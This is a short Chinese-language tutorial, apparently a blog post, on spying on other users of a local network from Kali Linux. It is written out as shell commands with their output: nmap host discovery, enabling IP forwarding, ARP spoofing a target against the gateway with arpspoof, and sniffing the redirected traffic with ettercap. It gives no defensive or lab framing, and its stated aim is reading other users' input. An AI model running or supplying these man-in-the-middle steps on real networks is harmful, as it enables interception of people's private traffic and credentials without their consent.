使用nmap 工具在局域网里进行侦探,查看局域网里ip存活数量

root@kali:~# nmap -sP 192.168.1.0/24

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 20:59 EST

Nmap scan report for 192.168.1.1 (192.168.1.1)

Host is up (0.0026s latency).

MAC Address: EC:82:63:85:01:E0 (Unknown)

Nmap scan report for tl-wdr6300 (192.168.1.2)

Host is up (0.0039s latency).

MAC Address: BC:46:99:71:F2:E2 (Tp-link Technologies)

Nmap scan report for 192.168.1.3 (192.168.1.3)

Host is up (0.00016s latency).

MAC Address: B0:35:9F:09:70:8B (Intel Corporate)

Nmap scan report for hao-pc (192.168.1.6)

Host is up (0.00056s latency).

MAC Address: 00:0C:29:B8:63:5A (VMware)

Nmap scan report for 192.168.1.200 (192.168.1.200)

Host is up (0.00030s latency).

MAC Address: 00:0C:29:1C:FD:85 (VMware)

Nmap scan report for kali (192.168.1.5)

Host is up.

Nmap done: 256 IP addresses (6 hosts up) scanned in 2.00 seconds

Kali linux查看局域网内其他用户的输入信息

扫描端口:

Nmap 192.168.1.6

进行arp欺骗:

在进行arp欺骗之前需要开启ip转发,没有ip转发目标机器就会无法上网。

root@kali:~# cat /proc/sys/net/ipv

ipv4/ ipv6/

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

1

root@kali:~#

 

进行arp欺骗

root@kali:~# arpspoof -i

eth0  lo    

root@kali:~# arpspoof -i eth0 192.168.1.6 192.168.1.1

Version: 2.4

Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

root@kali:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a

 

获取靶机信息

root@kali:~# ettercap -Tq -i eth0

 

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

 

Listening on:

  eth0 -> 00:0C:29:C5:32:32

  192.168.1.5/255.255.255.0

  fe80::20c:29ff:fec5:3232/64

 

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 65534 EGID 65534...

 

  33 plugins

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

 

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

 

6 hosts added to the hosts list...

Starting Unified sniffing...

 

 

Text only Interface activated...

Hit 'h' for inline help

 

随着靶机查看信息得到反馈

获取到的信息是所有的数据流量(就是有点多)